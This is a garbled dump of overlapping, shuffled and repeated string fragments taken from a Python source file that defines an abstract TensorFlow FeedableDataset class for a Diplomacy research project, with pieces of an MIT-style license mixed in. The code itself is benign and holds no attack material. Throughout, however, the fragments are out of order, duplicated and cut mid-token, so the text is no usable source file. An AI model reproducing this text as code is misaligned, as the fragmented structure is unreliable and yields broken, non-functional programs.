# ============================================================================== \"\"\" Feedable", "\"\"\" # Checking all features in items, padding them and converting them to", "and flattening # Scalar - Just converting # Fixed Len - Padding and", "if the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines", "An instance of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional.", "hereby granted, free of charge, to any person obtaining # a copy of", "tornado.concurrent.Future that will be set with the results when they become available \"\"\"", "__del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset", "inside a model \"\"\" from abc import ABCMeta, abstractmethod import logging import numpy", "flattening # Scalar - Just converting # Fixed Len - Padding and converting", "whom the Software is # furnished to do so, subject to the following", "and converting them to the right dtype for feature in item: assert feature", "available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the", "make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\"", "isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype)", "granted, free of charge, to any person obtaining # a copy of this", "\"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation", ":param queue_name: The name of the queue where to put the item :param", "closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise", "the item :param item: A dictionary with the fields required 
for that queue", "documentation files (the \"Software\"), # to deal in the Software without restriction, including", "results when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds", "dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields", "None self.iterator = None self._is_started = False self._is_initialized = False self._is_closing = False", "proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to lists if", "fields required for that queue :param retry_on_failure: Boolean that indicates to retry querying", "Optional. If set, the cluster configuration will be used for distributed training. :type", "used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder =", "The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self,", "{} # Will be used as default if features are missing self.session =", "dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the", "dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields", "is # furnished to do so, subject to the following conditions: # #", "and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature],", "Converting and flattening # Scalar - Just converting # Fixed Len - Padding", "# sell copies of the Software, and to permit persons to whom the", "def is_started(self): \"\"\" Determines if the dataset has been started \"\"\" return self._is_started", "abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField", "- Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature]", "outputs of a name using item as inout :param queue_name: The name of", "cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and", "return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod", "@property def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized", "\"\"\" from abc import ABCMeta, abstractmethod import logging import numpy as np from", "iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the", "distribute, sublicense, and/or # sell copies of the Software, and to permit persons", 
"\"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\"", "Makes sure the item respects the required protofields and casts/pads the item accordingly", "when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a", "list(item[feature]) # Var Len - Converting and flattening # Scalar - Just converting", "set with the results when they become available \"\"\" raise NotImplementedError() @staticmethod def", "is encountered. :return: A tornado.concurrent.Future that will be set with the results when", "= False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines", "def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs)", "import ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder,", "Dataset - Abstract class responsible for feeding data inside a model \"\"\" from", "as default if features are missing self.session = None self.iterator = None self._is_started", "the required protofields and casts/pads the item accordingly \"\"\" # Checking all features", "item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field,", "using item as inout :param queue_name: The name of the queue where to", "querying from the model if an error is encountered. 
:return: A tornado.concurrent.Future that", "import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import", "a name using item as inout :param queue_name: The name of the queue", "def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing", "tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and", "# Var Len - Converting and flattening # Scalar - Just converting #", "sublicense, and/or # sell copies of the Software, and to permit persons to", "FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder,", "the dataset has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines", "\"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has been", "item as inout :param queue_name: The name of the queue where to put", "Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the", "\"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can support an", "\"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its", "ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField,", "\"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self):", "with the fields required for that queue :param retry_on_failure: Boolean that indicates to", "@property def is_started(self): \"\"\" Determines if the dataset has been started \"\"\" return", "Software, and 
to permit persons to whom the Software is # furnished to", "import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is", "to the right dtype for feature in item: assert feature in self.proto_fields, 'Feature", "\"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can", "is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset", "build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\"", "# copies or substantial portions of the Software. # ============================================================================== \"\"\" Feedable Dataset", "copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software,", "# NOTICE: Permission is hereby granted, free of charge, to any person obtaining", "methods :param cluster_config: Optional. If set, the cluster configuration will be used for", "in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to lists", "diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields =", "is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape:", "without restriction, including without limitation the # rights to use, copy, modify, merge,", "item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of", "Starts the dataset :param session: The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session", "session): \"\"\" Initializes the dataset (and its iterator) :param session: The TensorFlow session", "use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes", "Determines if the dataset can support an iterator or if it is a", "can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator or if it", "the outputs of a name using item as inout :param queue_name: The name", "# Fixed Len - Padding and converting if proto_field.dtype is None: continue elif", "Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\"", "from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This", "the dataset can support an iterator or if it is a remote (RPC)", "furnished to do so, subject to the following conditions: # # The above", "and this permission notice shall be included in all # copies or substantial", "set): item[feature] = list(item[feature]) # Var Len - Converting and flattening # Scalar", "training. 
:type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config =", "= cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as", "them to the right dtype for feature in item: assert feature in self.proto_fields,", "get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using", "the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset", "FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def", "@abstractmethod def start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow session", "self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects the required", "error is encountered. :return: A tornado.concurrent.Future that will be set with the results", "item: assert feature in self.proto_fields, 'Feature %s is not in proto fields.' %", "`BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional. If set, the", "Abstract class responsible for feeding data inside a model \"\"\" from abc import", "elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature],", "def can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator or if", "is not in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets", "the dataset :param session: The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session \"\"\"", "BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class", "feature in item: assert feature in self.proto_fields, 'Feature %s is not in proto", "items, padding them and converting them to the right dtype for feature in", "the cluster configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type", "# Checking all features in items, padding them and converting them to the", "not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape),", "for feature in item: assert feature in self.proto_fields, 'Feature %s is not in", ":param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods :param", "self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return", "modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and", "from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER", "\"\"\" Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self):", "\"\"\" Feedable Dataset - Abstract class responsible for feeding data inside a model", "Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes", "that queue :param retry_on_failure: Boolean that indicates to retry querying from the model", "NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow", "raise NotImplementedError() @staticmethod 
def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object", "copies of the Software, and to permit persons to whom the Software is", "will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\"", "in item: assert feature in self.proto_fields, 'Feature %s is not in proto fields.'", "will be set with the results when they become available \"\"\" raise NotImplementedError()", "for feeding data inside a model \"\"\" from abc import ABCMeta, abstractmethod import", "\"\"\" Initializes the dataset (and its iterator) :param session: The TensorFlow session to", "return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\"", "notice shall be included in all # copies or substantial portions of the", "get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def", "@staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def", "in all # copies or substantial portions of the Software. # ============================================================================== \"\"\"", "if an error is encountered. 
:return: A tornado.concurrent.Future that will be set with", "a model \"\"\" from abc import ABCMeta, abstractmethod import logging import numpy as", "proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype)", "a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if", "self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property", "shall be included in all # copies or substantial portions of the Software.", "accordingly \"\"\" # Checking all features in items, padding them and converting them", "item respects the required protofields and casts/pads the item accordingly \"\"\" # Checking", "retry querying from the model if an error is encountered. :return: A tornado.concurrent.Future", "= {} # Will be used as default if features are missing self.session", "them and converting them to the right dtype for feature in item: assert", "The above copyright notice and this permission notice shall be included in all", "self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def", "session: The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod", "generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An", "charge, to any person obtaining # a copy of this software and associated", "return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects the", "self.session = None self.iterator = None self._is_started = False self._is_initialized = False self._is_closing", "pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a", "return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\"", "the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding", "proto-fields and generation methods :param cluster_config: Optional. If set, the cluster configuration will", "feature proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature]", "%s is not in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting", "an error is encountered. :return: A tornado.concurrent.Future that will be set with the", "a copy of this software and associated documentation files (the \"Software\"), # to", "raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return", "'Feature %s is not in proto fields.' 
% feature proto_field = self.proto_fields[feature] #", "numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list", "item accordingly \"\"\" # Checking all features in items, padding them and converting", "\"\"\" Starts the dataset :param session: The TensorFlow session to use. :type session:", "is_started(self): \"\"\" Determines if the dataset has been started \"\"\" return self._is_started @property", "feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance", "default if features are missing self.session = None self.iterator = None self._is_started =", "can support an iterator or if it is a remote (RPC) dataset \"\"\"", "Just converting # Fixed Len - Padding and converting if proto_field.dtype is None:", "= np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning", "logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\" def", "sell copies of the Software, and to permit persons to whom the Software", "Copyright 2019 - <NAME> # # NOTICE: Permission is hereby granted, free of", "# # The above copyright notice and this permission notice shall be included", "BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default if features are", "copies or substantial portions of the Software. 
# ============================================================================== \"\"\" Feedable Dataset -", "if it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self):", "None self._is_started = False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\"", "= logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\"", "use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the", "NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param", "**kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item):", "\"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession", "be used as default if features are missing self.session = None self.iterator =", "cluster configuration will be used for distributed training. 
:type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config:", "prepare_item(self, item): \"\"\" Makes sure the item respects the required protofields and casts/pads", "VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif", "of charge, to any person obtaining # a copy of this software and", "def start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow session to", "dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of", "is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod def", ":type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the", "dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset", "self._is_started = False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor", "if the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds", "including without limitation the # rights to use, copy, modify, merge, publish, distribute,", "from abc import ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder", "- Converting and flattening # Scalar - Just converting # Fixed Len -", "elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item", "the model if an error is encountered. 
:return: A tornado.concurrent.Future that will be", "casts/pads the item accordingly \"\"\" # Checking all features in items, padding them", "if features are missing self.session = None self.iterator = None self._is_started = False", "to retry querying from the model if an error is encountered. :return: A", "if the dataset has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\"", "Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes", "be set with the results when they become available \"\"\" raise NotImplementedError() @staticmethod", "if the dataset can support an iterator or if it is a remote", "\"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is initialized", "to whom the Software is # furnished to do so, subject to the", "False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if", "deal in the Software without restriction, including without limitation the # rights to", "A tornado.concurrent.Future that will be set with the results when they become available", "be included in all # copies or substantial portions of the Software. #", "np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants", "or substantial portions of the Software. 
# ============================================================================== \"\"\" Feedable Dataset - Abstract", "= False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\"", "of this software and associated documentation files (the \"Software\"), # to deal in", ":type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the", "of the queue where to put the item :param item: A dictionary with", "Scalar - Just converting # Fixed Len - Padding and converting if proto_field.dtype", "def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized @property", "the queue where to put the item :param item: A dictionary with the", "def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session):", "proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature] =", "converting them to the right dtype for feature in item: assert feature in", "the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\" self._is_closing =", "retry_on_failure: Boolean that indicates to retry querying from the model if an error", "do so, subject to the following conditions: # # The above copyright notice", "\"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects", ":type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config", "session: The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def", "\"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param session:", "dataset has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if", "# Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var", "a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset", "for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\" self._is_closing", "Determines if the dataset has been started \"\"\" return self._is_started @property def is_initialized(self):", "**kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects the required protofields", "= None self.iterator = None self._is_started = False self._is_initialized = False self._is_closing =", "configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig", "np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature]", "from the model if an error is encountered. :return: A tornado.concurrent.Future that will", "permit persons to whom the Software is # furnished to do so, subject", "copy of this software and associated documentation files (the \"Software\"), # to deal", "# Will be used as default if features are missing self.session = None", "without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense,", "model if an error is encountered. 
:return: A tornado.concurrent.Future that will be set", "queue where to put the item :param item: A dictionary with the fields", "item): \"\"\" Makes sure the item respects the required protofields and casts/pads the", "required for that queue :param retry_on_failure: Boolean that indicates to retry querying from", "The name of the queue where to put the item :param item: A", "= list(item[feature]) # Var Len - Converting and flattening # Scalar - Just", "or if it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def", "protofields and casts/pads the item accordingly \"\"\" # Checking all features in items,", "of a name using item as inout :param queue_name: The name of the", "are missing self.session = None self.iterator = None self._is_started = False self._is_initialized =", "is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param", "diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features =", "Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding data", "dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param", "queue_name: The name of the queue where to put the item :param item:", "included in all # copies or substantial portions of the Software. 
# ==============================================================================", "= self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature])", "# The above copyright notice and this permission notice shall be included in", "@abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self,", "the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the", "above copyright notice and this permission notice shall be included in all #", "proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True,", "become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for", "self.iterator = None self._is_started = False self._is_initialized = False self._is_closing = False def", "NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\"", "raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param session: The", "return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs", "indicates to retry querying from the model if an error is encountered. 
:return:", "Initializes the dataset (and its iterator) :param session: The TensorFlow session to use.", "Computes the outputs of a name using item as inout :param queue_name: The", "all features in items, padding them and converting them to the right dtype", "associated documentation files (the \"Software\"), # to deal in the Software without restriction,", "and associated documentation files (the \"Software\"), # to deal in the Software without", "in the Software without restriction, including without limitation the # rights to use,", "dictionary with the fields required for that queue :param retry_on_failure: Boolean that indicates", "with the results when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook():", "converting # Fixed Len - Padding and converting if proto_field.dtype is None: continue", "np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item", "Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] =", "session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs):", "- <NAME> # # NOTICE: Permission is hereby granted, free of charge, to", "def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name", "self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used", "instance of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional. 
If", "this permission notice shall be included in all # copies or substantial portions", "Determines if the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\"", "dataset can support an iterator or if it is a remote (RPC) dataset", "the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure", "remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the", "Checking all features in items, padding them and converting them to the right", "# a copy of this software and associated documentation files (the \"Software\"), #", "to any person obtaining # a copy of this software and associated documentation", "is hereby granted, free of charge, to any person obtaining # a copy", "# Scalar - Just converting # Fixed Len - Padding and converting if", "that indicates to retry querying from the model if an error is encountered.", "def prepare_item(self, item): \"\"\" Makes sure the item respects the required protofields and", "<NAME> # # NOTICE: Permission is hereby granted, free of charge, to any", "inout :param queue_name: The name of the queue where to put the item", "============================================================================== # Copyright 2019 - <NAME> # # NOTICE: Permission is hereby granted,", "to deal in the Software without restriction, including without limitation the # rights", "following conditions: # # The above copyright notice and this permission notice shall", "logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model", "of the Software, and to permit persons to whom the Software is #", "item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using item as", "the fields required for that queue :param retry_on_failure: Boolean 
that indicates to retry", "\"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder`", "= False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def", "features in items, padding them and converting them to the right dtype for", "None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature]", "the item accordingly \"\"\" # Checking all features in items, padding them and", "in self.proto_fields, 'Feature %s is not in proto fields.' % feature proto_field =", "item[feature] = list(item[feature]) # Var Len - Converting and flattening # Scalar -", ":type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields)", "free of charge, to any person obtaining # a copy of this software", "============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding data inside a", "respects the required protofields and casts/pads the item accordingly \"\"\" # Checking all", "<filename>diplomacy_research/models/datasets/feedable_dataset.py # ============================================================================== # Copyright 2019 - <NAME> # # NOTICE: Permission is", "Will be used as default if features are missing self.session = None self.iterator", "(the \"Software\"), # to deal in the Software without restriction, including without limitation", "and/or # sell copies of the Software, and to permit persons to whom", "put the item :param item: A dictionary with the fields required for that", "started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is", "be used 
for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder", "MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\" self._is_closing = True", "Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len", "# Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\"", "rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies", "Feedable Dataset - Abstract class responsible for feeding data inside a model \"\"\"", "LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset", "is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines", "session): \"\"\" Starts the dataset :param session: The TensorFlow session to use. :type", "to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\"", "assert feature in self.proto_fields, 'Feature %s is not in proto fields.' % feature", "def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the", "raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its iterator)", "self._is_closing = False def __del__(self): \"\"\" 